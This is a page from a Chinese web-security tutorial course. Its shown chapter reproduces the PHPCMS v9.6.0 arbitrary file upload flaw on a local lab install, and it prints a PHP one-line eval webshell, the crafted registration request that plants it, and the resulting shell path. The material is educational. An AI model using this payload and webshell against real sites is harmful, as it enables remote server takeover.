{ "create_date": "2018-4-2", "update_date": "2018-4-10", "username": "静河流", "views": 6194, "favorator": 2, "publish_doctype": "2" }
返回
章节
笔记
APP查看
XSS
1、xss的形成原理
2、xss的分类
3、代码案例分析
3.1、反射型xss
3.2、存储型xss
3.3、dom型xss
CSRF
1、csrf的原理与危害
2、csrf的利用分类与案例分析
3、解决方案
SSRF
1、ssrf的原理与危害
2、漏洞代码示例
3、ssrf的挖掘与防御
XXE
1、基础知识
2、xxe的原理与案例
SQL Injection
1、sql注入的原理与分类
2、盲注
3、DVWA SQL Injection分析与利用
4、DVWA SQL Injection (Blind)分析与利用
5、Sqlmap盲注利用
6、防范sql注入
File Upload
1、上传漏洞的原理与总结
2、PHPcms9.6.0 任意文件上传漏洞利用与分析
3、解析漏洞总结
命令注入(Command Injection)
1、命令注入漏洞
暂无章节
2、PHPcms9.6.0 任意文件上传漏洞利用与分析
### 漏洞复现 使用XAMPP搭建好环境,接着安装PHPCMS V9.6.0。 [PHPCMS V9.6.0 官方下载地址](http://bbs.phpcms.cn/thread-933447-1-1.html) 在phpcms根目录下写入一句话木马的txt记事本文件: ```<?php @eval($_POST['shell0']);?>``` ![](/upload/attach/201804/201804091754_AN4UEPCA95R6H3H.jpg) 路径为: http://localhost/phpcms/shell.txt ![](/upload/attach/201804/201804091754_YWK2SKC3PCBUMTE.jpg) 此时是txt记事本文件,解释器解析不了里面的PHP代码,所以用菜刀连接失败。 ![](/upload/attach/201804/201804091755_9KPSP89ESXERJAD.jpg) 打开主页找到注册页面,填写基本信息,提交用burpsuite抓包: ![](/upload/attach/201804/201804091755_UXDHQQAHN5KE2EU.jpg) ![](/upload/attach/201804/201804091755_A4V4EHNFHNN8B3Z.jpg) send to repeater: 修改request 请求包的payload: ``` siteid=1&modelid=1&username=usera&password=password&pwdconfirm=password&email=usera%40test.com&nickname=nichenga&info[content]=href=http://localhost/phpcms/shell.txt?.php#.jpg&dosubmit=1&protocol= ``` ![](/upload/attach/201804/201804091755_TXU9U6AZ6XWH74D.jpg) response标黄的部分就是返回的shell地址,注意上面我们抓取的modelid值原本为10,payload改成了数字1,目的就是为了在response中显示shell路径。 ``` http://localhost/phpcms/uploadfile/2018/0403/20180403044429440.php ``` 这个路径的文件就是PHP一句话小马: ![](/upload/attach/201804/201804091755_RDDMD83ZC44R6PD.jpg) 用菜刀连接成功: ![](/upload/attach/201804/201804091756_YX9YBWE9SYQUJ6J.jpg) ### 注:用PHP7版本测试上面的一句话木马是连接不了的,使用PHP5可以连接成功。 漏洞分析参考p0wd3r的[PHPCMS v9.6.0 任意文件上传漏洞分析](https://www.seebug.org/vuldb/ssvid-92930)
⋮
问答
标题
雪币悬赏
(剩余
0
雪币)
内容
提交
请扫码订阅
有回复时将及时提醒您
其他问答
暂无记录
笔记
公开笔记
提交
取消
保存
同学笔记({{ other_total }})
我的笔记({{ my_total }})
{{ item.username }}
{{item.video_time_fmt}}
查看完整内容
{{ item.create_date_fmt }}
{{item.is_public == 1 ?"已公开":"未公开"}}
笔记审核中
收起
删除
编辑
{{ item.likes }}
{{ item.likes }}
采集
已采集
上一页
下一页
资料下载
暂无记录
作业
暂无记录
看原图
APP扫码查看
如何下载?看雪APP
下载
扫码下载